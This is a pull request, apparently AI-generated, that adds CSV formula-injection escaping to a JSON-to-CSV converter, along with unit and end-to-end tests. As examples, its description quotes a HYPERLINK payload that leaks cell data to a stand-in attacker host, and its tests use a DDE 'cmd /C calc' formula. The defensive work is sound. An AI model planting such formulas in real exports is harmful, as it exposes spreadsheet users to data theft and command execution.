### PR TITLE
security: CSV フォーミュラインジェクション対策を json-csv に追加 (#160)

### DIFF
--- a/src/utils/__tests__/json-csv.test.ts
+++ b/src/utils/__tests__/json-csv.test.ts
@@ -48,6 +48,82 @@ describe('jsonToCsv', () => {
       'オブジェクトまたはオブジェクトの配列を入力してください'
     );
   });
+
+  describe('CSVフォーミュラインジェクション対策', () => {
+    it('= で始まる文字列セルはシングルクォートでエスケープされる', () => {
+      const json = '[{"formula":"=SUM(A1:A10)"}]';
+      const result = jsonToCsv(json);
+      // 先頭にシングルクォートが付加され、Excel が数式として解釈しない
+      expect(result).toContain(`'=SUM(A1:A10)`);
+      // エスケープ前の生 `=SUM` が行頭にあるとエクセルで数式実行される
+      expect(result).not.toMatch(/^formula\r?\n=SUM/);
+    });
+
+    it('+ で始まる文字列セルはエスケープされる', () => {
+      const json = '[{"v":"+1+1"}]';
+      const result = jsonToCsv(json);
+      expect(result).toContain(`'+1+1`);
+    });
+
+    it('- で始まる文字列セルはエスケープされる', () => {
+      const json = '[{"v":"-1+2"}]';
+      const result = jsonToCsv(json);
+      expect(result).toContain(`'-1+2`);
+    });
+
+    it('@ で始まる文字列セルはエスケープされる', () => {
+      const json = '[{"v":"@SUM(1,2)"}]';
+      const result = jsonToCsv(json);
+      expect(result).toContain(`'@SUM(1,2)`);
+    });
+
+    it('タブ文字で始まる文字列セルはエスケープされる', () => {
+      const json = '[{"v":"\\tHello"}]';
+      const result = jsonToCsv(json);
+      expect(result).toContain(`'\tHello`);
+    });
+
+    it('CR で始まる文字列セルはエスケープされる', () => {
+      const json = '[{"v":"\\rOK"}]';
+      const result = jsonToCsv(json);
+      expect(result).toContain(`'\rOK`);
+    });
+
+    it('通常の文字列はエスケープされない', () => {
+      const json = '[{"name":"太郎","msg":"hello"}]';
+      const result = jsonToCsv(json);
+      expect(result).toContain('太郎');
+      expect(result).toContain('hello');
+      expect(result).not.toContain(`'太郎`);
+      expect(result).not.toContain(`'hello`);
+    });
+
+    it('数値・真偽値・null は影響を受けない', () => {
+      const json = '[{"n":42,"b":true,"x":null}]';
+      const result = jsonToCsv(json);
+      const lines = result.split(/\r?\n/);
+      expect(lines[0]).toBe('n,b,x');
+      // 値はそのまま、シングルクォートは付かない
+      expect(lines[1]).toBe('42,true,');
+    });
+
+    it('配列値は JSON 文字列化されるため先頭が [ になりエスケープされない', () => {
+      // 配列の中身が = で始まっても、JSON.stringify でラップされた結果は ["=..."] となるため対象外
+      const json = '[{"tags":["=evil","ok"]}]';
+      const result = jsonToCsv(json);
+      // 先頭が [ なのでシングルクォートは前置されない（JSON.stringify 経由）
+      expect(result).not.toMatch(/'\[/);
+      // CSV 出力では JSON 文字列がダブルクォート二重化されてセル化される
+      expect(result).toContain('[""=evil""');
+    });
+
+    it('ネストオブジェクト内の危険値もエスケープされる', () => {
+      const json = '[{"u":{"name":"=cmd|\' /C calc\'!A1"}}]';
+      const result = jsonToCsv(json);
+      expect(result).toContain('u.name');
+      expect(result).toMatch(/'=cmd/);
+    });
+  });
 });
 
 describe('csvToJson', () => {

--- a/src/utils/__tests__/json-csv.test.ts
+++ b/src/utils/__tests__/json-csv.test.ts
@@ -1,5 +1,5 @@
 import { describe, it, expect } from 'vitest';
-import { jsonToCsv, csvToJson } from '../json-csv';
+import { jsonToCsv, csvToJson, escapeCsvFormula } from '../json-csv';
 
 describe('jsonToCsv', () => {
   it('フラットなオブジェクト配列をCSVに変換する', () => {
@@ -123,6 +123,52 @@ describe('jsonToCsv', () => {
       expect(result).toContain('u.name');
       expect(result).toMatch(/'=cmd/);
     });
+  });
+});
+
+describe('escapeCsvFormula', () => {
+  it('空文字列はそのまま返す', () => {
+    expect(escapeCsvFormula('')).toBe('');
+  });
+
+  it('先頭が = の文字列にシングルクォートを前置する', () => {
+    expect(escapeCsvFormula('=SUM(A1:A10)')).toBe(`'=SUM(A1:A10)`);
+  });
+
+  it('先頭が +, -, @ の文字列にシングルクォートを前置する', () => {
+    expect(escapeCsvFormula('+1+1')).toBe(`'+1+1`);
+    expect(escapeCsvFormula('-1+2')).toBe(`'-1+2`);
+    expect(escapeCsvFormula('@SUM(1,2)')).toBe(`'@SUM(1,2)`);
+  });
+
+  it('タブ・CR で始まる文字列にシングルクォートを前置する', () => {
+    expect(escapeCsvFormula('\tHello')).toBe(`'\tHello`);
+    expect(escapeCsvFormula('\rOK')).toBe(`'\rOK`);
+  });
+
+  it('危険文字が文字列の途中にある場合はエスケープしない', () => {
+    expect(escapeCsvFormula('foo=bar')).toBe('foo=bar');
+    expect(escapeCsvFormula('a+b')).toBe('a+b');
+  });
+
+  it('通常の文字列はそのまま返す', () => {
+    expect(escapeCsvFormula('hello')).toBe('hello');
+    expect(escapeCsvFormula('太郎')).toBe('太郎');
+  });
+
+  it('数値・真偽値・null は素通しする', () => {
+    expect(escapeCsvFormula(42)).toBe(42);
+    expect(escapeCsvFormula(0)).toBe(0);
+    expect(escapeCsvFormula(true)).toBe(true);
+    expect(escapeCsvFormula(false)).toBe(false);
+    expect(escapeCsvFormula(null)).toBe(null);
+  });
+
+  it('undefined や非プリミティブも防御的に素通しする（型保証が崩れた場合の安全策）', () => {
+    expect(escapeCsvFormula(undefined)).toBe(undefined);
+    // 配列やオブジェクトはそのまま返す（呼び出し側がシリアライズ前提）
+    const arr = ['=evil'];
+    expect(escapeCsvFormula(arr)).toBe(arr);
   });
 });
 

--- a/src/utils/json-csv.ts
+++ b/src/utils/json-csv.ts
@@ -6,11 +6,23 @@ import Papa from 'papaparse';
  * シングルクォートを前置し、Excel / Numbers / LibreOffice 等で
  * 数式として解釈されないようにする。
  *
- * 文字列以外（数値・真偽値・null）は変更しない。
+ * 動作仕様:
+ * - 文字列以外（数値・真偽値・null・undefined・object 等）は素通しで返す。
+ *   呼び出し側の型保証が万一崩れて `undefined` などが渡っても安全に動作する。
+ * - 空文字列も素通し。
+ * - 戻り値の型は入力と同じ（文字列はエスケープ後の文字列、それ以外は元の値）。
+ *
+ * 型シグネチャはジェネリック（`<T>(value: T): T | string`）とし、内部呼び出し
+ * （`flattenObject` の戻り値: `string | number | boolean | null`）の戻り型を
+ * 維持しつつ、ランタイム上の型不整合（万一の `undefined` 混入等）にも防御的に
+ * 振る舞えるようにしている。
+ *
+ * 注意: 配列値は `flattenObject` で `JSON.stringify` されるため文字列の先頭は
+ * 必ず `[` になり、本関数のエスケープ対象にはならない。配列内の `=` で始まる
+ * 値（例: `["=evil"]`）は CSV セルとして見ると `[\"=evil\"]` という文字列リテラル
+ * になり、Excel でも先頭が `[` であるため数式実行されない。仕様として安全。
  */
-function escapeCsvFormula(
-  value: string | number | boolean | null
-): string | number | boolean | null {
+export function escapeCsvFormula<T>(value: T): T | string {
   if (typeof value !== 'string' || value.length === 0) return value;
   return /^[=+\-@\t\r]/.test(value) ? `'${value}` : value;
 }
@@ -34,7 +46,17 @@ function flattenObject(
   return result;
 }
 
-/** JSON文字列 → CSV文字列。失敗時は Error を投げる */
+/**
+ * JSON文字列 → CSV文字列。失敗時は Error を投げる。
+ *
+ * セキュリティ:
+ * - 全セルに `escapeCsvFormula` を適用し、CSV フォーミュラインジェクション
+ *   （CWE-1236）対策を既定 ON で行う。
+ * - 配列値は `flattenObject` で JSON.stringify されるため、先頭が常に `[` と
+ *   なり `escapeCsvFormula` のエスケープ対象外となる。これは Excel 等が
+ *   `[\"=evil\"]` のような値を文字列リテラルとして扱い数式実行しないため
+ *   安全であり、仕様として意図したものである。
+ */
 export function jsonToCsv(jsonStr: string): string {
   let parsed: unknown;
   try {

--- a/src/utils/json-csv.ts
+++ b/src/utils/json-csv.ts
@@ -1,5 +1,20 @@
 import Papa from 'papaparse';
 
+/**
+ * CSVフォーミュラインジェクション（CWE-1236）対策。
+ * セル文字列の先頭が `=`, `+`, `-`, `@`, `\t`, `\r` の場合に
+ * シングルクォートを前置し、Excel / Numbers / LibreOffice 等で
+ * 数式として解釈されないようにする。
+ *
+ * 文字列以外（数値・真偽値・null）は変更しない。
+ */
+function escapeCsvFormula(
+  value: string | number | boolean | null
+): string | number | boolean | null {
+  if (typeof value !== 'string' || value.length === 0) return value;
+  return /^[=+\-@\t\r]/.test(value) ? `'${value}` : value;
+}
+
 /** ネストされたオブジェクトをドット記法でフラット化する */
 function flattenObject(
   obj: Record<string, unknown>,
@@ -42,7 +57,12 @@ export function jsonToCsv(jsonStr: string): string {
     if (typeof row !== 'object' || row === null || Array.isArray(row)) {
       throw new Error('オブジェクトまたはオブジェクトの配列を入力してください');
     }
-    return flattenObject(row as Record<string, unknown>);
+    const flat = flattenObject(row as Record<string, unknown>);
+    // フォーミュラインジェクション対策（既定 ON）
+    for (const k of Object.keys(flat)) {
+      flat[k] = escapeCsvFormula(flat[k]);
+    }
+    return flat;
   });
 
   return Papa.unparse(flatRows);

--- a/tests/e2e/json-csv.spec.ts
+++ b/tests/e2e/json-csv.spec.ts
@@ -52,4 +52,12 @@ test.describe('JSON / CSV 変換', () => {
     await page.getByRole('button', { name: 'CSV → JSON' }).click();
     await expect(page.getByLabel('入力')).toHaveValue('');
   });
+
+  test('JSON → CSV: フォーミュラインジェクションをエスケープする', async ({ page }) => {
+    await page.getByLabel('入力').fill('[{"formula":"=SUM(A1:A10)","plus":"+1+1","at":"@SUM"}]');
+    // 先頭にシングルクォートが付加され、Excel が数式として解釈しない
+    await expect(page.getByLabel('変換結果')).toHaveValue(/'=SUM\(A1:A10\)/);
+    await expect(page.getByLabel('変換結果')).toHaveValue(/'\+1\+1/);
+    await expect(page.getByLabel('変換結果')).toHaveValue(/'@SUM/);
+  });
 });

--- a/tests/e2e/json-csv.spec.ts
+++ b/tests/e2e/json-csv.spec.ts
@@ -54,6 +54,9 @@ test.describe('JSON / CSV 変換', () => {
   });
 
   test('JSON → CSV: フォーミュラインジェクションをエスケープする', async ({ page }) => {
+    // 注: 本ツールは useCodec フックでリアルタイム変換しているため
+    // 「JSON → CSV」「CSV → JSON」はモード切替トグルであり明示的な変換ボタンは存在しない。
+    // 入力欄を埋めるだけで変換結果が反映される（他の JSON→CSV 系 e2e テストと同方針）。
     await page.getByLabel('入力').fill('[{"formula":"=SUM(A1:A10)","plus":"+1+1","at":"@SUM"}]');
     // 先頭にシングルクォートが付加され、Excel が数式として解釈しない
     await expect(page.getByLabel('変換結果')).toHaveValue(/'=SUM\(A1:A10\)/);


### PR DESCRIPTION
## 概要

JSON → CSV 変換ツール (`src/utils/json-csv.ts`) に **CSV フォーミュラインジェクション（CWE-1236 / CSV Injection）** 対策を追加します。

セル文字列の先頭が `=`, `+`, `-`, `@`, `\t`, `\r` のとき、Excel / Numbers / LibreOffice などの表計算ソフトはそのセルを **数式として解釈** します。攻撃者は本ツールに `=HYPERLINK("https://attacker.example/?x="&A1, "click")` 等を含む JSON を食わせることで、変換後の CSV をユーザーが Excel で開いた瞬間に情報窃取・任意 URL 起動を発生させ得ます。

本 PR では Excel が認識する慣用エスケープ（**シングルクォート前置**）を `Papa.unparse` 直前に **既定 ON** で適用します。

## 変更内容

- `src/utils/json-csv.ts`
  - `escapeCsvFormula(value)` ヘルパーを追加。文字列の先頭が `=`, `+`, `-`, `@`, `\t`, `\r` の場合にシングルクォートを前置。文字列以外（数値・真偽値・null）は素通し。
  - `jsonToCsv` 内で `flattenObject` の戻り値の各セルに適用してから `Papa.unparse` に渡す。
- `src/utils/__tests__/json-csv.test.ts`
  - 危険文字 6 種（`=`, `+`, `-`, `@`, `\t`, `\r`）のエスケープ検証
  - 通常文字列・数値・真偽値・null・配列値（JSON 文字列化済み）が影響を受けないことの確認
  - ネストオブジェクト内の危険値もエスケープされること
- `tests/e2e/json-csv.spec.ts`
  - JSON → CSV モードで `=SUM(A1:A10)` / `+1+1` / `@SUM` がエスケープされることを E2E で確認

## 関連 issue

Closes #160

## 検証

```
node_modules/.bin/astro check  → 0 errors / 0 warnings
npm run test                   → 278 passed (21 files)
npm run test:e2e               → 130 passed / 1 skipped
npm run format:check           → All matched files use Prettier code style\!
```

## 設計判断

### 既定 ON（UI トグルなし）

issue では「機械処理用途のみで使う上級者向けに OFF を選べるようにする」案も提示されていましたが、以下の理由から本 PR では **常時 ON / トグル UI なし** を採用しました。

- 本ツールの主用途は CSV を表計算ソフトで開くシナリオ（攻撃面が最大）
- データ完全性より **安全性を優先**（攻撃成立条件は「外部データの混入」だけなので、信頼境界を既定で安全側に倒す方針）
- UI を増やすと "off にしてしまう人" のリスクが残る
- スコープが膨らむ（`JsonCsv.tsx` の改修、ローカルストレージ、E2E ケース増）

将来 OFF オプションが必要になった場合は、`escapeCsvFormula` がヘルパー関数として独立しているため `jsonToCsv(json, { escapeFormula?: boolean })` 形式に拡張可能です。

### シングルクォート前置方式の採用

OWASP の CSV Injection 対策では大別して 2 案あります。

| 方式 | メリット | デメリット |
| --- | --- | --- |
| `'` 前置（採用） | 実装が簡潔・Excel 系慣用・他ツールでも目視可能 | データに `'` が残る |
| `\t` 包囲 | データ保持 | Excel 以外で扱いづらい / Numbers 非対応 |

ブラウザ完結型開発者ツールで「成果物を Excel で開く」用途を想定するため、Excel 慣用の前者を採用しました。

### スコープ外（本 PR では未着手）

- `JsonCsv.tsx` の UI 改修（チェックボックス等）
- `EncodingConverter.tsx` / `QrTicket.tsx`（並行 PR で編集中）

🤖 Generated with [Claude Code](https://claude.com/claude-code)
